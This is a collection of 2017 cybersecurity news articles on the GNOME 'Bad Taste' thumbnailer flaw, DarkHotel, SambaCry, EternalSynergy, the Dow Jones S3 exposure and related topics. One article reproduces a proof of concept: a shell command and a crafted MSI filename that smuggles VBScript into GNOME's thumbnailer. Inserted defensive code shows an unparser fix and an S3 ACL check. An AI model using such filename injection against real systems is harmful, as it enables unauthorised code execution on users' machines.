CyberX ICS Attack Vector Prediction

Scanning OT networks is not as easy as scanning IT networks because invasive actions can cause downtime. In order to prevent disruption to the customer’s systems, CyberX says its product simulates attack vectors by using agentless asset discovery and vulnerability assessment technology that combines a deep understanding of industrial systems and non-invasive traffic analysis.

The Attack Vector Prediction technology is available now as part of the base CyberX platform at no additional charge to existing customers. The CyberX platform is priced based on the number of monitored appliances, whether physical or virtual.

With the addition of the attack prediction technology to its offering, CyberX says it addresses all four requirements outlined in Gartner’s Adaptive Security Architecture framework: prediction, prevention, detection and response.


Critical Code Injection Flaw In Gnome File Manager Leaves Linux Users Open to Hacking
20.7.2017 thehackernews Vulnerability

A security researcher has discovered a code injection vulnerability in the thumbnail handler component of GNOME Files file manager that could allow hackers to execute malicious code on targeted Linux machines.
Dubbed Bad Taste, the vulnerability (CVE-2017-11421) was discovered by German researcher Nils Dagsson Moskopp, who also released proof-of-concept code on his blog to demonstrate the vulnerability.
The code injection vulnerability resides in "gnome-exe-thumbnailer" — a tool that generates thumbnails for Windows executable files (.exe/.msi/.dll/.lnk) under GNOME, which requires users to have the Wine application installed on their systems.
For those who are unaware, Wine is free and open-source software that allows Windows applications to run on the Linux operating system.
Moskopp discovered that, while navigating to a directory containing an .msi file, GNOME Files takes the filename as executable input and runs it in order to create an image thumbnail.
For successful exploitation of the vulnerability, an attacker can send a crafted Windows installer (MSI) file with malicious VBScript code in its filename, which, if downloaded on a vulnerable system, would compromise the machine without further user interaction.
"Instead of parsing an MSI file to get its version number, this code creates a script containing the filename for which a thumbnail should be shown and executes that using Wine," Moskopp explains while demonstrating his PoC.
"The script is constructed using a template, which makes it possible to embed VBScript in a filename and trigger its execution."
The flaw can be exploited by potential hackers using other attack vectors as well, for example, by directly inserting a USB-drive with a malicious file stored on it, or delivering the malicious file via drive-by-downloads.
How to Protect Yourself from Bad Taste
Moskopp reported the vulnerability to the GNOME Project and the Debian Project. Both of them patched the vulnerability in the gnome-exe-thumbnailer file.
The vulnerability affects gnome-exe-thumbnailer versions before 0.9.5. So, if you run a Linux OS with the GNOME desktop, check for updates immediately before you become affected by this critical vulnerability.
Meanwhile, Moskopp also advised users to:
Delete all files in /usr/share/thumbnailers.
Do not use GNOME Files.
Uninstall any software that facilitates automatic execution of filenames as code.
Moskopp also advised developers to not use "bug-ridden ad-hoc parsers" to parse files, to "fully recognise inputs before processing them," and to use unparsers, instead of templates.


CrowdStrike, Dragos Partner to Deliver Comprehensive ICS Security Services

20.7.2017 securityweek ICS

Cloud-based endpoint security firm CrowdStrike and Dragos, a company that specializes in protecting industrial control systems (ICS), announced on Tuesday a strategic partnership whose goal is to provide comprehensive cybersecurity services.

Joint customers will benefit from a combination of CrowdStrike’s assessment, preparedness and incident response services and Dragos’ expertise in protecting ICS. The offering is designed to help critical infrastructure and other organizations secure their systems against sophisticated threats.

Customers will be provided proactive enterprise security services through CrowdStrike’s Falcon platform, compilation and correlation of ICS security events via the Dragos platform, and expertise for preventing, assessing and responding to ICS incidents.

The partnership will also offer comprehensive enterprise and industry intelligence, and improved awareness, visibility and protection against threats that pose a serious risk to organizations using both networked endpoints and industrial devices.

“At CrowdStrike, we track a wide array of adversaries going after critical infrastructure with incredibly sophisticated attack methods and tools. In order to stop these breaches, it’s important to combine domain knowledge of the industrial threat landscape, actionable intelligence, advanced security services and endpoint protection technology,” said Thomas Etheridge, vice president of services at CrowdStrike. “We are thrilled to partner with Dragos, a company that brings unrivalled expertise in ICS/SCADA systems to offer joint customers improved security planning, awareness, visibility, and exceptionally fast response to incidents.”

“Current security solutions are blind to how adversaries breach industrial systems and disrupt critical operations. Together, CrowdStrike and Dragos leverage proven human expertise, adversary intelligence and unrivaled technology to uniquely equip our customers with a full understanding of the enterprise and industrial threat landscape,” said Ben Miller, director of Threat Operations at Dragos.


'DarkHotel' APT Uses New Methods to Target Politicians

20.7.2017 securityweek APT

The DarkHotel threat group has been using some new methods in attacks aimed at government employees with an interest in North Korea, according to a report published this week by security firm Bitdefender.

The activities of the DarkHotel advanced persistent threat (APT) actor came to light in November 2014, when Kaspersky published a report detailing a sophisticated cyber espionage campaign targeting business travelers in the Asia-Pacific region. The group has been around for nearly a decade and some researchers believe its members are Korean speakers.

The attackers targeted their victims using several methods, including through their hotel’s Wi-Fi, zero-day exploits and peer-to-peer (P2P) file sharing websites. Nearly one year later, the threat group was observed using new attack techniques and an exploit leaked from Italian spyware maker Hacking Team.

DarkHotel victims have been spotted in several countries, including North Korea, Russia, South Korea, Japan, Bangladesh, Thailand, Taiwan, China, the United States, India, Mozambique, Indonesia and Germany. Up until recently, the attacks appeared to focus on company executives, researchers and development personnel from sectors such as defense industrial base, military, energy, government, NGOs, electronics manufacturing, pharmaceutical, and medical.

In more recent DarkHotel attacks, which it has dubbed “Inexsmar,” security firm Bitdefender says the hackers targeted political figures and appeared to be using some new methods.

Bitdefender’s analysis is based on samples from September 2016. The initial Trojan downloader, delivered via phishing emails, collects information on the infected device and sends it back to its command and control (C&C) server. If the compromised system meets requirements (i.e. it belongs to an individual who is of interest), the first stage DarkHotel downloader, disguised as a component of OpenSSL, is fetched.

In the meantime, in an effort to avoid raising suspicion, the malware opens a document titled “Pyongyang e-mail lists - September 2016,” which provides a list of email contacts for various organizations in North Korea’s capital city.

If the system profile does not match what the attackers are looking for, the C&C server returns a “fail” string and the attack stops. If the attack continues, a second payload is retrieved.

When Bitdefender analyzed the malware samples, the C&C server was offline, making it impossible to know exactly who the victims were and how much damage was caused. However, Bitdefender’s Bogdan Botezatu told SecurityWeek that, based on the structure of the phishing message, the intended targets are most likely individuals working for governments or state institutions who have an interest in the political situation in North Korea.

Experts believe that the use of social engineering and a multi-stage downloader is an improvement compared to the direct use of exploits as it gives the attackers more flexibility in malware distribution and ensures that the Trojan remains up to date.


A bug in Gnome pic parser can be exploited to run malicious VBScripts
20.7.2017 securityaffairs Exploit  Virus

A bug in your image thumbnailer could represent a new attack vector for hackers that can exploit it for script injection.
Another day, another bug in a popular application.

To create image thumbnails, GNOME Files takes the filename as executable input.

The flaw was detailed by the researcher Nils Dagsson Moskopp, who provided useful suggestions to avoid being hacked.

“Thumbnail generation for MSI files in GNOME Files executes arbitrary VBScript.” states Moskopp.

“Delete all files in /usr/share/thumbnailers. Do not use GNOME Files. Uninstall any other software that facilitates automatically executing parts of filenames as code”.

Dagsson Moskopp published PoC code leveraging Wine to execute VBScript. His PoC places an MSI file with a crafted name in a folder and tricks GNOME Files into creating a file called badtaste.txt.


Create MSI Files

Create a file named poc.xml with the following content:

<?xml version="1.0" encoding="utf-8"?>
<Wix xmlns="http://schemas.microsoft.com/wix/2006/wi">
<Product Version="1.0"/>
</Wix>

Execute the following Bourne Shell code:

wixl -o poc.msi poc.xml
cp poc.msi "poc.msi\",0):Set fso=CreateObject(\"Scripting.FileSystemObject\"):Set poc=fso.CreateTextFile(\"badtaste.txt\")'.msi"

Trigger Execution

Start GNOME Files and navigate to the folder with the MSI files. An empty file with the name badtaste.txt should appear.

“Whenever an icon for a Microsoft Windows executable (EXE), installer (MSI), library (DLL), or shortcut (LNK) should be shown, Gnome Files calls /usr/bin/gnome-exe-thumbnailer to either extract an embedded icon from the file in question or deliver a fallback image for the appropriate filetype.” explained the expert.

The expert highlighted that the problem is triggered by a single line of code in /usr/bin/gnome-exe-thumbnailer:

DISPLAY=NONE wine cscript.exe //E:vbs //NoLogo Z:\\tmp\\${TEMPFILE1##*/}.vbs 2>/dev/null \
“Instead of parsing an MSI file to get its version number, this code creates a script containing the filename for which a thumbnail should be shown and executes that using Wine. The script is constructed using a template, which makes it possible to embed VBScript in a filename and trigger its execution.” Dagsson Moskopp added.

In order to avoid problems, Dagsson Moskopp suggests developers should not use “ad-hoc parsers” to parse files, should “fully recognise inputs before processing them”, and should use unparsers.

Below are the remedy suggestions for both users and developers:

Remedy (for users)

“Delete all files in /usr/share/thumbnailers. Do not use GNOME Files. Uninstall any other software that facilitates automatically executing parts of filenames as code.”

Remedy (for developers)

“Do not parse files with bug-ridden ad-hoc parsers. Fully recognize inputs before processing them. Do not use templates, use unparsers instead. Read about LANGSEC.”
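To make the template-versus-unparser advice concrete, here is an added illustration (not the thumbnailer's code and not Dagsson Moskopp's): UNSAFE_TEMPLATE is an assumed sketch of how a filename gets pasted into VBScript, the unparser emits the name as a single properly quoted VBScript string literal, and a small recognizer counts the statements that actually result from the PoC filename.

```python
"""Filename-in-template injection versus an unparser, modelled on the
gnome-exe-thumbnailer bug. Added illustration: UNSAFE_TEMPLATE is an assumed
sketch of the script's shape, not the real thumbnailer code."""

# Filename from Dagsson Moskopp's PoC, with the shell-level escaping removed.
POC_FILENAME = (
    'poc.msi",0):Set fso=CreateObject("Scripting.FileSystemObject")'
    ":Set poc=fso.CreateTextFile(\"badtaste.txt\")'.msi"
)

# Assumed template: the filename is pasted into VBScript source as-is.
UNSAFE_TEMPLATE = 'Set db = installer.OpenDatabase("{name}",0)'


def render_unsafe(filename: str) -> str:
    """Template approach: the characters of the filename become VBScript tokens."""
    return UNSAFE_TEMPLATE.format(name=filename)


def vbs_string_literal(value: str) -> str:
    """Unparser: emit value as exactly one VBScript string literal.
    An embedded quote is written as two quotes; a literal cannot span
    lines, so control characters are rejected instead of guessed at."""
    if any(ord(c) < 0x20 or ord(c) == 0x7F for c in value):
        raise ValueError("control character in filename")
    return '"' + value.replace('"', '""') + '"'


def render_safe(filename: str) -> str:
    """Same statement as the template, but the name goes through the unparser."""
    return "Set db = installer.OpenDatabase({name},0)".format(
        name=vbs_string_literal(filename))


def read_string_literal(src: str, pos: int):
    """Recognizer for one VBScript string literal starting at src[pos].
    Returns (decoded value, index just past the closing quote)."""
    if pos >= len(src) or src[pos] != '"':
        raise ValueError("expected opening quote at %d" % pos)
    out, i = [], pos + 1
    while i < len(src) and src[i] not in "\r\n":
        if src[i] == '"':
            if src[i + 1:i + 2] == '"':      # doubled quote is a literal quote
                out.append('"')
                i += 2
                continue
            return "".join(out), i + 1
        out.append(src[i])
        i += 1
    raise ValueError("unterminated string literal")


def count_statements(line: str) -> int:
    """Number of ':'-separated statements on one VBScript line, ignoring
    separators inside string literals and anything after a ' comment."""
    n, i = 1, 0
    while i < len(line):
        c = line[i]
        if c == '"':
            _, i = read_string_literal(line, i)
        elif c == "'":
            break
        else:
            if c == ":":
                n += 1
            i += 1
    return n


if __name__ == "__main__":
    unsafe, safe = render_unsafe(POC_FILENAME), render_safe(POC_FILENAME)
    print(count_statements(unsafe), "statements from the template")   # 3
    print(count_statements(safe), "statement from the unparser")       # 1
    # Fully recognizing the literal gives the original filename back unchanged.
    print(read_string_literal(vbs_string_literal(POC_FILENAME), 0)[0] == POC_FILENAME)
```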


DDoS Tools availability Online, a worrisome trend
20.7.2017 securityaffairs 
Attack

Experts warn of an increased availability of DDoS tools online; many wannabe hackers download and use them without awareness of the consequences.
As cyber crime reaches new levels, with new malware and viruses being released online on a daily basis, it also becomes apparent that the number of DDoS tools requiring no particular skill is increasing: just providing an IP address is enough to launch an attack. These tools are becoming more and more available on the Internet.

We are all aware of the effects a DDoS attack can have on a company, not only rendering its website inaccessible but also causing a loss of online revenue and sales.

With the release of such applications comes the added threat of users knowingly allowing backdoors into their computer systems, giving the creators access to the device so they can continue attacks in the user's absence. A backdoor in a system gives access not only to the distributor but also to anyone else who finds it.

The main concern is not only that many young people are downloading and using these tools, but also that they are misled into using them and believe they are safe when taking part in denial of service attacks on high-profile sites, including government domains, causing those sites to go offline and become unreachable.

It’s very important nowadays to be aware of what your children are downloading from the Internet, and to only install applications that come from verified software companies and are scanned before installation or execution.

These groups are spreading their vulnerable applications through increasingly blatant means on mainstream social media, where most of the younger generation spends its time on the web.

(I am not going to advise on how to use denial of service tools and stay anonymous, but I can assure you that the application you installed is not protecting you; it is infecting your system.)

Please see below the DDoS tools and applications found by our cyber research division at Frontline Cyber Security Ltd in a short search over some popular social media sites (no names mentioned). We were checking how easily accessible DDoS tools are to the general web user.

Distributed denial of service applications found (download link details removed; please contact us if you are a researcher or analyst):

LOIC RedCult Edition – RiskwareAgent – MD5 609db4b9154f9aee29a5ceb775bec655
RedCult Doser – Loic.7 – MD5 6d0abacacd4393f9b3e30b2ed3be316e
RC Doors – Malware.SDi.5EDF – MD5 b1465ff2711b3cc9c4c8faf414354e7d
exe – Win32.DarkKomet – MD5 606aeb40c65070d234e1617d1ab257ff
ddos_android – Android.SpyAgent – MD5 c99ccf4d61cefa985d94009ad34f697f
Here is an image of the Android application running: fill out a few boxes and click send.


We also obtained a list of targets these applications were released to attack, and have also managed to collect screenshots of the tools in use against government sites.

Below are some images of the application being used in what appears to be one of many Anonymous Operations in this case #OpIsrael.

We have a list of servers the tool was designed to attack but are unable to post it at this time.


The below image shows the application being shared and distributed


In regards to the above DDoS tools, the relevant authorities have been notified and are assisting in having them removed.


Black Hat is coming and with it a good reason to update your “Broadcom-based” devices
20.7.2017 securityaffairs  Mobil

BroadPwn potentially exposes millions of Android devices using Broadcom Wi-Fi chips to remote compromise; update your “Broadcom-based” devices.
Black Hat 2017 opens in 3 days, and with it comes a potential concern for most of us. It turns out that one of the conference presentations, entitled BROADPWN: REMOTELY COMPROMISING ANDROID AND IOS VIA A BUG IN BROADCOM’S WI-FI CHIPSETS [1], will detail how Broadcom BCM43xx Wi-Fi chipsets can be exploited to achieve full code execution on the compromised device without user interaction.

“An attacker within range may be able to execute arbitrary code on the Wi-Fi chip”, says Apple about this vulnerability (CVE-2017-9417) in today’s security bulletin [2].


Besides Apple, those chipsets are present on most smartphone devices like HTC, LG, Nexus and most Samsung models as well. Make sure to have this vulnerability fixed on all your devices — especially if you are planning to be in Las Vegas next week.

References
[1] https://www.blackhat.com/us-17/briefings.html#broadpwn-remotely-compromising-android-and-ios-via-a-bug-in-broadcoms-wi-fi-chipsets
[2] https://support.apple.com/pt-br/HT207923


Google Warns Users of Potentially Risky Web Apps

19.7.2017 securityweek  Security

Google is taking another step to better protect users from malicious third-party web applications: it is now warning users of newly created web apps and Apps Scripts that are pending verification.

The move follows a series of similar protective measures the Internet giant announced earlier this year, after many of its users were hit by a phishing attack where a rogue app was found impersonating Google Docs. To prevent similar incidents, the company tightened OAuth rules and also started scrutinizing new web apps that request user data.

The new warning screen will be accompanied by changes expected to improve the developer experience, the company says, adding that the verification process and the new warnings will expand to existing apps in the coming months.

The new “unverified app” screen that users will see when accessing newly created web applications and Apps Scripts that require verification will replace the “error” page that has been served to developers and users over the past several months. The screen will appear before users are taken to the permissions consent screen, informing them that the app has not yet been verified.

Through these new notices, users will be automatically informed if they may be at risk, thus helping them make more informed decisions to keep their information safe. The testing and developing of applications should also be simplified.

“This will help reduce the risk of user data being phished by bad actors. This new notice will also help developers test their apps more easily,” Naveen Agarwal, Identity team, and Wesley Chun, Developer Advocate, G Suite, note in a blog post.

Users have the option to dismiss the alert, which allows developers to test applications without going through the OAuth client verification process first. Google has published a series of steps in a help center article to provide information on how to begin the verification process to remove the interstitial and prepare their app for launch.

The same protections are being applied to Apps Script beginning this week, meaning that all new Apps Scripts requesting OAuth access to data from users in other domains may also get the "unverified app" alert. Additional information was published in a verification documentation page.

“Apps Script is proactively protecting users from abusive apps in other ways as well. Users will see new cautionary language reminding them to ‘consider whether you trust’ an application before granting OAuth access, as well as a banner identifying web pages and forms created by other users,” Agarwal and Chun say.

Next, Google is planning an expansion of the verification process to existing apps as well, meaning that developers of some current apps may have to go through the verification flow. To ensure no issue will hinder the transition, developers should make sure their contact information is up-to-date.

“In the Google Cloud Console, developers should ensure that the appropriate and monitored accounts are granted either the project owner or billing account admin IAM role. In the API manager, developers should ensure that their OAuth consent screen configuration is accurate and up-to-date,” Google says.

The company has published help center articles to provide detailed information on granting IAM roles and on configuring the consent screen.


Organizations Slow to Patch Critical Memcached Flaws

19.7.2017 securityweek  Vulnerebility

Tens of Thousands of Internet-Exposed Memcached Servers Are Vulnerable to Attacks

Tens of thousands of servers running Memcached are exposed to the Internet and affected by several critical vulnerabilities disclosed last year by Cisco’s Talos intelligence and research group.

In late October 2016, Talos published an advisory describing three serious flaws affecting Memcached, an open source, high performance distributed memory caching system used to speed up dynamic web apps by reducing the database load.

The vulnerabilities, tracked as CVE-2016-8704, CVE-2016-8705 and CVE-2016-8706, allow a remote attacker to execute arbitrary code on vulnerable systems by sending specially crafted Memcached commands. The flaws can also be leveraged to obtain sensitive data that could allow an attacker to bypass exploit mitigations.

The security holes were patched by Memcached developers before Talos disclosed its findings. A few months later, in late February and early March 2017, researchers conducted Internet scans to find out how many organizations had patched their installations.

The scans uncovered a total of more than 107,000 servers accessible over the Internet and nearly 80 percent of them, or roughly 85,000 servers, were still vulnerable. Furthermore, only approximately 22 percent of the servers, or roughly 24,000, required authentication.

Nearly 30,000 of the vulnerable servers were located in the United States, followed by China (17,000), the United Kingdom (4,700), France (3,200), Germany (3,000), Japan (3,000), the Netherlands (2,600), India (2,500) and Russia (2,300).

After completing the scans, Cisco obtained contact email addresses for all the IP addresses associated with the vulnerable servers and attempted to notify affected organizations.

Six months later, researchers conducted another scan, but the situation improved only slightly, with roughly 10 percent of systems patched since the previous analysis. However, the number of servers requiring authentication dropped to 18,000, or 17 percent of the total.

Interestingly, researchers noticed that more than 28,000 of the previously discovered servers were no longer online. However, since the total number of Internet-facing installations remained the same, experts determined that some servers either changed their IPs or organizations had been deploying new systems with vulnerable versions of Memcached.

Talos warned that these vulnerable Memcached installations could be targeted in ransom attacks similar to the ones that hit MongoDB databases in early 2017. While Memcached is not a database, it can still contain sensitive information and disrupting it could have a negative impact on other dependent services.

“The severity of these types of vulnerabilities cannot be understated,” experts warned. “These vulnerabilities potentially affect a platform that is deployed across the internet by small and large enterprises alike. With the recent spate of worm attacks leveraging vulnerabilities this should be a red flag for administrators around the world. If left unaddressed the vulnerabilities could be leveraged to impact organizations globally and impact business severely.”

The number of Memcached instances accessible from the Internet has remained fairly constant over the past years. An analysis conducted in August 2015 uncovered 118,000 Memcached instances exposing 11 terabytes of data.


Millions of Dow Jones Customer Records Exposed Online

19.7.2017 securityweek  Incindent

American news and financial information firm Dow Jones & Company inadvertently exposed the details of millions of its customers. The data was found online by researchers in an Amazon Web Services (AWS) S3 bucket that had not been configured correctly.

Chris Vickery of cyber resilience firm UpGuard discovered on May 30 an AWS data repository named “dj-skynet” that appeared to contain the details of 4.4 million Dow Jones customers. Dow Jones disabled access to the files only on June 6.

The files included names, customer IDs, physical addresses, subscription details, the last four digits of credit cards and, in some cases, phone numbers belonging to individuals who subscribed to Dow Jones publications such as The Wall Street Journal and Barron’s.

One of the exposed files stored 1.6 million entries for Dow Jones Risk and Compliance, a risk management and regulatory compliance service for financial institutions.

According to UpGuard, the data was accessible because Dow Jones employees had configured the repository’s permissions to allow access to anyone with an AWS account. There are over one million Amazon cloud users and anyone can register an account for free.

Dow Jones confirmed the data leak, but claimed only 2.2 million of its customers were affected, not 4.4 million as UpGuard claims. The security firm has admitted that there could be some duplicate entries.

It’s unclear if affected customers will be notified, but in a statement to The Wall Street Journal the company downplayed the incident, arguing that there is no evidence the data was taken by anyone else and the exposed information does not pose a significant risk to users.

UpGuard disagrees and points out that the data could be highly valuable to malicious actors for phishing and other social engineering schemes.

In recent weeks, the security firm reported finding exposed databases storing data belonging to the U.S. National Geospatial-Intelligence Agency (NGA), American voters, and Verizon customers. Unprotected Amazon S3 buckets were involved in all incidents.

“Yet another demonstration of how services such as AWS are missing basic steps that ensure their data and services are configured in a secure fashion,” Bitglass CEO Rich Campagna told SecurityWeek.

“It’s seems like a no-brainer to implement data-centric security tools on any sensitive information that could get out to the public. This approach could ensure that cloud services deny unauthorized access, and organizations could take it one step further and encrypt sensitive data at rest,” Campagna added. “Companies like Dow Jones, Verizon and anyone else using the public cloud for their infrastructure can easily enforce policies that require internal teams and third-parties to adequately protect any customer data that touches the cloud.”
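The misconfiguration described above, access for "anyone with an AWS account", corresponds in S3 ACL terms to a grant to the predefined AuthenticatedUsers group. Here is an added illustration (not UpGuard's or Dow Jones' tooling) that flags such grants in an ACL of the shape boto3's get_bucket_acl() returns and produces the corrected ACL; the sample ACL is constructed and no AWS call is made.

```python
"""Spot S3 bucket ACL grants that open a bucket to every AWS account.
Added illustration, not UpGuard's or Dow Jones' tooling. The sample ACL is
constructed in the shape boto3's get_bucket_acl() returns; nothing is fetched."""

# Predefined S3 grantee groups. AllUsers is anonymous access; AuthenticatedUsers
# is any holder of any AWS account, which is the setting the article describes.
ALL_USERS = "http://acs.amazonaws.com/groups/global/AllUsers"
AUTHENTICATED_USERS = "http://acs.amazonaws.com/groups/global/AuthenticatedUsers"
EXPOSING_GROUPS = {ALL_USERS: "AllUsers", AUTHENTICATED_USERS: "AuthenticatedUsers"}


def _is_exposing(grant: dict) -> bool:
    grantee = grant.get("Grantee", {})
    return grantee.get("Type") == "Group" and grantee.get("URI") in EXPOSING_GROUPS


def public_grants(acl: dict) -> list:
    """(group name, permission) pairs granting access beyond the owning account."""
    return [(EXPOSING_GROUPS[g["Grantee"]["URI"]], g["Permission"])
            for g in acl.get("Grants", []) if _is_exposing(g)]


def remediated_acl(acl: dict) -> dict:
    """Corrected ACL: same owner, every grant to a public group dropped."""
    return {"Owner": acl.get("Owner"),
            "Grants": [g for g in acl.get("Grants", []) if not _is_exposing(g)]}


# Constructed sample: the owner keeps FULL_CONTROL, but READ was also granted
# to the AuthenticatedUsers group, so any AWS account could list the bucket.
SAMPLE_ACL = {
    "Owner": {"ID": "EXAMPLE-OWNER-CANONICAL-ID"},
    "Grants": [
        {"Grantee": {"Type": "CanonicalUser", "ID": "EXAMPLE-OWNER-CANONICAL-ID"},
         "Permission": "FULL_CONTROL"},
        {"Grantee": {"Type": "Group", "URI": AUTHENTICATED_USERS},
         "Permission": "READ"},
    ],
}

if __name__ == "__main__":
    print("exposing grants:", public_grants(SAMPLE_ACL))            # [('AuthenticatedUsers', 'READ')]
    print("after fix:", public_grants(remediated_acl(SAMPLE_ACL)))  # []
```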


EternalSynergy-Based Exploit Targets Recent Windows Versions

19.7.2017 securityweek  Exploit

A security researcher has devised an EternalSynergy-based exploit that can compromise versions of Windows newer than Windows 8.

EternalSynergy is one of several exploits allegedly stolen by the hacker group calling themselves the Shadow Brokers from the National Security Agency (NSA)-linked Equation Group. The exploit was made public in April along with several other hacking tools, one month after Microsoft released patches for them.

In May, a security researcher included EternalSynergy and six other NSA-linked hacking tools (EternalBlue, EternalChampion, EternalRomance, DoublePulsar, Architouch, and Smbtouch) in a network worm called EternalRocks. The tool was pulled weeks later to prevent abuse.

Security researcher Worawit Wang has now made public an EternalSynergy-derived exploit that also leverages EternalRomance and can be used on a wider range of Windows versions.

Available on both GitHub and ExploitDB, the tool targets 64-bit versions of Windows 2016, Windows 2012 R2, Windows 8.1, Windows 2008 R2 SP1, and Windows 7 SP1, as well as the 32-bit versions of Windows 8.1 and Windows 7 SP1.

Security researcher Sheila A. Berta, who is part of Telefonica's Eleven Paths security unit, has published a paper (PDF) on how to use Wang’s tool to get a Meterpreter session on Windows Server 2016.

EternalSynergy is based on the CVE-2017-0143 vulnerability, which “stems from not taking the command type of an SMB message into account when determining if the message is part of a transaction,” Microsoft reveals. “In other words, as long as the SMB header UID, PID, TID and OtherInfo fields match the corresponding transaction fields, the message would be considered to be part of that transaction.”

According to Microsoft, EternalSynergy should not work on Windows iterations newer than Windows 8, due to kernel security improvements such as Hypervisor-enforced Code Integrity (HVCI), which prevents unsigned kernel pages from being executed, and Control Flow Guard (CFG), designed to prevent invalid indirect function calls.

The exploit is expected to crash on unsupported operating system releases, but Wang managed to create a stable tool that targets Windows XP and newer versions, except Windows 10. Given that a patch is already available from Microsoft, impacted users should consider applying it as soon as possible.

EternalSynergy is only one of the NSA-linked exploits to have caught researchers’ attention over the past several months. EternalBlue might be the most discussed such tool, after it has been abused in global attacks by ransomware such as WannaCry, the UIWIX ransomware, Adylkuzz botnet, and a stealth Remote Access Trojan.

Last month’s destructive NotPetya wiper also used EternalBlue to spread within compromised networks, along with the EternalRomance exploit and various other tools.


Malware Targets NAS Devices Via SambaCry Exploit

19.7.2017 securityweek  Virus

A piece of malware dubbed by researchers SHELLBIND leverages a recently patched Samba vulnerability in attacks aimed at Internet of Things (IoT) devices, particularly network-attached storage (NAS) appliances.

The Samba flaw exploited in these attacks, tracked as CVE-2017-7494 and known as SambaCry and EternalRed, can be exploited by a malicious client to upload a shared library to a writable share, and then cause the server to load that library. This allows a remote attacker to execute arbitrary code on the targeted system.

The security hole was introduced in the Samba code in 2010 and it was patched in May. Since the Samba interoperability software suite is highly popular, the vulnerability affects the products of several major vendors, including NAS appliances.

Roughly two weeks after the patch was released, security firms noticed that the vulnerability had been exploited to deliver a cryptocurrency miner.

In early July, researchers at Trend Micro spotted another type of attack involving SambaCry. Cybercriminals have been exploiting the vulnerability in attacks targeting NAS devices used by small and medium-size businesses. The malware they have been using works on various architectures, including MIPS, ARM and PowerPC.

Attackers can leverage the Shodan Internet search engine to identify devices using Samba and write the initial malware files to their public folders.

According to Trend Micro, ELF_SHELLBIND.A is delivered as a SO file to Samba public folders and loaded via the SambaCry vulnerability. Once it’s deployed on the targeted system, the malware contacts a command and control (C&C) server located in East Africa. The threat modifies firewall rules to ensure that it can communicate with its server.

“Once the connection is successfully established and authentication is confirmed, then the attacker will have an open command shell in the infected systems where he can issue any number of system commands and essentially take control of the device,” explained Trend Micro researchers.

Users can protect their systems against these attacks by ensuring that Samba is up to date. Another mitigating factor is the need to have writable access to a shared location on the targeted system.


Court Upholds Gag Orders in National Security Letters

19.7.2017 securityweek  Security

The Ninth U.S. Circuit Court of Appeals in San Francisco confirmed a lower court decision Monday that gag orders included in FBI National Security Letters (NSLs) do not violate the First Amendment of the U.S. Constitution's free speech protections.

It has been a long journey to this decision (PDF) centered around five NSLs; three received by CREDO in 2011 and 2013, and two received by Cloudflare in 2012. The two organizations petitioned the district court to have both the information requests and the non-disclosure requirements of the NSLs set aside.

The district court decided that the 2006 NSL Law was unconstitutional and enjoined the government from issuing new requests and enforcing the gag (but stayed the decision pending a government appeal). It did not set aside the existing five NSLs. CREDO and Cloudflare, and the government, appealed the decision.

With the appeals pending, the government enacted the USA FREEDOM Act, which became effective June 2, 2015. Given the new law, the appeals court sent the matter back to the district court. This time, the lower court decided that the NSL law, as amended, is constitutional, and that the FBI had shown sufficient cause. It allowed the government's cross-petition to enforce the NSLs and gags, barring the two 2013 CREDO NSLs.

CREDO and Cloudflare appealed the decision to uphold three of the NSLs, and the government appealed the decision to set aside the two 2013 CREDO NSLs. Meanwhile, the FBI closed its investigations pertaining to the three remaining NSLs, and voluntarily and partly lifted the gagging orders.

But CREDO and Cloudflare persisted, arguing that the whole concept of gagging NSLs contravenes the constitutional right to free speech.

It is this final petition that was rejected by the appeals court on Monday. Ironically, it is the FREEDOM Act that upholds the decision. The FREEDOM Act enforces greater administrative care over the delivery of NSLs and gag orders -- but if that care is taken, the requests become legal. That, at least, is the decision of the Ninth.

"We conclude," announced the three judges, "that § 2709(c)'s nondisclosure requirement imposes a content-based restriction that is subject to, and withstands, strict scrutiny. We further hold that, assuming the nondisclosure requirement is the type of prior restraint for which the Freedman procedural safeguards are required, the NSL law provides those safeguards. The nondisclosure requirement in the NSL law therefore does not run afoul of the First Amendment."

It is not yet known whether CREDO and Cloudflare will continue the fight and appeal to the Supreme Court. Electronic Frontier Foundation (EFF) staff attorney Andrew Crocker tweeted, "Disappointing 9th Cir ruling in EFF's national security letter case on behalf of @CREDOMobile @Cloudflare. More soon." He added, "Especially disappointing is the court's failure to address permanent NSL gags, which always violate the First Amendment."

In a statement emailed to SecurityWeek, CREDO CEO Ray Morris said, "We are disappointed in the Ninth Circuit's decision and are considering our options for next steps. At CREDO, we know what an uphill battle challenging these gag orders can be and feel that the court missed an opportunity to protect the First Amendment rights of companies that want to speak out in the future."

Last week, EFF published its 2017 report, Who Has Your Back? It explains the issues behind NSLs. "NSLs are akin to subpoenas requiring service providers -- including technology companies, phone companies, and ISPs -- to hand over data to the FBI about users' private communications and Internet activity. These orders are almost always accompanied by gag orders preventing the recipients from ever revealing the letter's existence and which have contributed to widespread abuse of this investigatory tool."

Although Cloudflare was not included in the EFF study, CREDO is one of just 9 companies out of 26 awarded five stars for its attitudes and attempts to protect user privacy.

"Cloudflare's approach to law enforcement requests is that we are supportive of their work but believe that any requests we receive must adhere to the due process of law and be subject to judicial oversight," Doug Kramer, General Counsel at Cloudflare told SecurityWeek. "It is not Cloudflare's intent to make their job any harder, or easier. In 2013, we challenged an FBI request for customer information on a confidential basis through an NSL, which was not an easy decision, because we felt it violated that principle. Although decisions by a federal court and a new statute since that time have improved the NSL process, we think there is additional work to be done and are disappointed the Ninth Circuit ruled the current practice sufficient."

*Updated with comment from Cloudflare


UK Spy Agency Warns of State-sponsored Hackers Targeting Critical Infrastructure

19.7.2017 securityweek  BigBrothers

The U.K. Government Communications Headquarters (GCHQ), Britain's secret eavesdropping agency, warns that 'a number of [UK] Industrial Control System engineering and services organisations are likely to have been compromised' following the discovery of 'connections from multiple UK IP addresses to infrastructure associated with advanced state-sponsored hostile threat actors.'

The warning comes from a National Cyber Security Centre (NCSC) memo obtained by Motherboard and confirmed by the BBC. NCSC is part of the UK's primary cyber intelligence agency, GCHQ.

From the little information available, it doesn't appear as if there are any specifically known compromises -- NCSC might simply be working from the statistical probability that if enough phishing attacks are launched, at least some will inevitably succeed.

Spear-phishing is not specifically mentioned within the memo, although it does mention a separate, non-public report from the FBI and DHS last month suggesting the same attackers were using spear-phishing to deliver poisoned Word documents. Motherboard also points to a paywalled report in the Times, Saturday, which states, "Hackers backed by the Russian government have attacked energy networks running the national grid in parts of the UK, The Times has learnt."

